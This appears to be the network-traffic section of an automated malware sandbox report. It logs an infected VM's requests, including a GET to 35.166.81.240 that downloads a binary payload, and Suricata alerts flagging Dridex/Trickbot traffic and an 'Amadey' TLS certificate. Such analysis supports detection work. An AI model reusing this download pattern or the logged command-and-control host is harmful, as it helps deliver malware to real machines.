Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
- TCP Requests
- UDP Requests
-
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://35.166.81.240/waters/travel/new21
REQUEST
RESPONSE
BODY
GET /waters/travel/new21 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0
update: /waters/travel/new21
Host: 35.166.81.240
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Content-Type: application/octet-stream
Content-Length: 123392
Connection: keep-alive
Date: 2021-03-25 08:42:08
X-Tag: 2
Set-Cookie: allocated=565747
Set-Cookie: xPid=wiDSBKJNl5A24LcxQC7Utc%2BmcItxRdjaQCqj73JWcRqzRPITEn%2FsY22xqlvNk4XkhFDt3tK3b8WcfeD%2FXNgIT1mmv3JGSwBDSVJmrZtiVgMT8QhSvkOSZlmhpibajgc7
Set-Cookie: blocked=WB15jC3QuxWFFqWUBM1ZKDzyDHDqyu5o_i78OXXbmAs_y9UGJ3-bFY1UotqEGF7d4IH41FsuHGz0KwSgxbxODup7tRxpRIolX_fbaJU72hXnKLTYF-0ZiqaozxwfkgwSW43AV9D_wZWDoagI9tUKshEyjWBm6_g00T8zg6OqtdchpkxKqkLEtdHNxp1b7KQQNas-HkwqOyXCJ2d6PHXEC5DZeEs4fvjrdXQwfK_2KRKaxUbBWYWfBOPtM8-dbw0c
Set-Cookie: dSID=stK9EftSV8TkjZgsHjJ3YgvQX5ApyFSC47wGeusbylOJqk14lude2ONdf8d1M5_JkXdA1O5tD5YypBofIzHnUtUl0MiIWSqtxjKQrdHmX7wRkVAFcWYA_faltwvD1V0qfLd0WVZER4qsP2Q3W_6FKASAyMoISkNdosepLwz-Xc_leJ_t4Zn2wLHF2__fgqM0EeTiskMh1banivtkbV32lRcl8H1UsDNruYEZU5bYr2Hu-8Xce4IlJfpbRuZa7nKG
Vary: Accept
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment; filename="UagvqorwkJUiV-tZtRlv"
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
192.168.56.101 | 8.8.7.7 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49213 -> 35.166.81.240:443 | 2028401 | ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex | Unknown Traffic |
TCP 35.166.81.240:443 -> 192.168.56.101:49213 | 2023476 | ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | A Network Trojan was detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49213 35.166.81.240:443 |
C=AT, ST=Bohn, L=Bohn, O=Amadey TM, OU=Amadey Org, CN=amadeamadey.at | C=AT, ST=Bohn, L=Bohn, O=Amadey TM, OU=Amadey Org, CN=amadeamadey.at | db:43:d0:55:5c:42:2f:4a:67:c8:eb:0d:da:a9:e7:13:22:8f:d9:28 |
Snort Alerts
No Snort Alerts